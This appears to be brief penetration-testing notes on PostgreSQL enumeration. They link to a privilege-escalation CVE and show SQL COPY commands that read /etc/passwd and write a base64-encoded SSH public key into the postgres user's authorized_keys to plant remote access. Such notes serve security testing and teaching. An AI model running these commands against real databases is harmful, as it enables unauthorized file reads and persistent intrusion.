Enumeration
Mandatory
- Try to connect.
Optional
- Privilege escalation within PSQL to superuser: https://staaldraad.github.io/post/2020–12-15-cve-2020–25695-postgresql-privesc/
- Try to read files:
postgres=# CREATE TABLE demo(t text);
CREATE TABLE
postgres=# COPY demo from '/etc/passwd';
COPY 20
postgres=# SELECT * FROM demo;
Try to write a file:
COPY (select convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';
Leave a Reply
You must be logged in to post a comment.